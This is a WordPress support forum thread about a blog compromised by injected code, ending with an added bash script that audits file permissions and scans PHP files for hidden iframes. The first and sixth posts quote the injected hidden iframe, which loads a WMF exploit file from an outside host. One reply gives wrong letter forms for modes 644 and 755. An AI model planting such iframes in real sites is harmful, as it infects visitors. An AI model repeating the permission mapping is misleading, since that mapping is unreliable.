How did a site write javascript to my blog? (12 posts)

  1. Roar
    Member
    Posted 8 years ago #

    All of a sudden, people are saying my site is giving them a virus alert, and when I view the source, I have this odd javascript on the top of the first page.

    I am looking through all the pages via the theme editor and I cannot find that to make it go away!

    help?

    <iframe src="http://www.wnplake.net/lgs/1.wmf" height=1 width=1></iframe>
    <SCRIPT language="javascript"><!--
    var tracker_loaded = 0;
    //--></SCRIPT>
    <SCRIPT language="javascript" SRC="http://www.hitscreen.com/html/tracker.js">
    </SCRIPT>
    <SCRIPT language="javascript"><!--
    if(tracker_loaded) {
    document.writeln(make_stats_now('fcep', 'http://www.hitscreen.com/cgi-bin/x.cgi'));
    };
    //--></SCRIPT>
    <SCRIPT language="javascript"><!--
    document.write("<"+"!--");
    //--></SCRIPT>
    <NOSCRIPT>
    <A HREF="http://www.hitscreen.com/" target="_top"><IMG
    SRC="http://www.hitscreen.com/cgi-bin/x.cgi?NAVG=Tracker&username=fcep" BORDER=0></A>
    </NOSCRIPT>
    <SCRIPT language="javascript"><!--
    document.write("--"+">");
    //--></SCRIPT>

  2. Mark (podz)
    Support Maven
    Posted 8 years ago #

    I'm not seeing it.
    Check the index.php at domain root, not just the one in the themes directory.

    It's an exploit by a script on the host server that finds writable files and puts links like this inside.
    Tell your host and if they don't seem bothered, make plans to move to a good host.

  3. j0d
    Member
    Posted 8 years ago #

    If you want hosting, we do a free hosting plan: 25MB space, 1 SQL, a small text ad is required though. Email me for more details.

    I've had problems with sucky hosts before, really pissed me off.

  4. Roar
    Member
    Posted 8 years ago #

    I will have to let them know. I found the bit in the index.php.

    I've used esosoft since 1997 and this is the first problem! Can you believe?

    But thanks and I will email them right now.

  5. whooami
    Member
    Posted 8 years ago #

    It's all about those permissions -- posts like these aren't going to be going down in number any time soon, unfortunately.

  6. Roar
    Member
    Posted 8 years ago #

    Actually....

    there is an exploit in Windows. (and of course, Internet Explorer!)

    Here is the security bulletin...
    http://www.microsoft.com/technet/security/Bulletin/MS06-001.mspx

    and here is the code where it snuck it in...
    <iframe src="http://www.wnplake.net/lgs/1.wmf" height=1 width=1></iframe>

    The virus comes in via that wmf file somehow. Hmmm. Not sure if I got it or they got it?

    *stabs Internet Explorer repeatedly*

  7. vkaryl
    Member
    Posted 8 years ago #

    Um. This was discussed here about a week ago, with links to fixes posted. As usual, I can't find the relevant post, since search is such a pile of you-know....

  8. whooami
    Member
    Posted 8 years ago #

    Actually, that's old news, rorie, but it simply being "out there" doesn't account for it making it onto your site.

    That's in your permissions.

  9. Bhoney
    Member
    Posted 8 years ago #

    How can I make sure my permissions are set as they should be without going through every single file and checking?

    Thanks :)

  10. vkaryl
    Member
    Posted 8 years ago #

    Generally, your files should be 644 and your folders 755. It's fairly easy to do a quick scan using an ftp client such as WS_FTP Pro: you'll see in the right pane a list of your files and folders, and each will have some letters to the right of the file or folder name.

    644 = rw rw rw (or sometimes rw-rw-rw)
    755 = rws rx rx (or sometimes rwx-rx-rx)

  11. Bhoney
    Member
    Posted 8 years ago #

    Thank V :)

  12. Roar
    Member
    Posted 8 years ago #

    Sorry, vkaryl. I did try searching. In case anyone else reads this, it also hit the wp-blog-header.php file.

    and my permissions are all correct. :(

    OH! And here is the original post.
    http://wordpress.org/support/topic/54434?replies=19

    :) I did not know to search for wmf when I had the first error.

    Thank you, I always appreciate all the quick help here.
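
For the question in post 9 and the file checks in posts 2 and 12, here is an added example (not code from any poster in this thread) that audits a WordPress directory for modes other than 644/755, for group- or world-writable entries, and for PHP files carrying a hidden 1x1 iframe like the one quoted in the first post. The function names, the demo tree and the `injected.example` URL are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: audit a WordPress tree for loose modes and an injected hidden iframe.
# Function names, the demo tree and injected.example are constructed for illustration.

# Files that are not exactly 644 (rw-r--r--), directories that are not 755 (rwxr-xr-x).
audit_modes() {
    find "$1" -type f ! -perm 644 -print
    find "$1" -type d ! -perm 755 -print
}

# Anything the group or "other" users can write to, whatever the rest of the mode is.
audit_writable() {
    find "$1" \( -type f -o -type d \) \( -perm -020 -o -perm -002 \) -print
}

# PHP files containing an iframe with height or width of 0 or 1 (heuristic: it will
# also flag legitimate tracking frames, so review each hit by hand).
scan_injected() {
    pattern="<iframe[^>]*(height|width)=[\"']?[01]([^0-9]|\$)"
    find "$1" -type f -name '*.php' -exec grep -liE "$pattern" {} + || :
}

# Constructed sample tree: one clean file, one injected world-writable file, one 777 dir.
make_demo_tree() {
    demo_root=$(mktemp -d)
    mkdir "$demo_root/wp-content"
    printf '<?php // clean\n' > "$demo_root/wp-blog-header.php"
    printf '%s\n' '<iframe src="http://injected.example/x" height=1 width=1></iframe>' \
        '<?php // original index.php continues here' > "$demo_root/index.php"
    chmod 755 "$demo_root"
    chmod 777 "$demo_root/wp-content"
    chmod 644 "$demo_root/wp-blog-header.php"
    chmod 666 "$demo_root/index.php"
    echo "$demo_root"
}

report() {
    echo "== not 644/755 ==";            audit_modes "$1"
    echo "== group/world-writable ==";   audit_writable "$1"
    echo "== PHP with hidden iframe =="; scan_injected "$1"
}

# Pass the WordPress directory as the first argument; with none, the demo tree is used.
report "${1:-$(make_demo_tree)}"
```

The content scan is independent of the mode checks, so a file that already has correct permissions but still contains the injected markup is reported.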

Topic Closed

This topic has been closed to new replies.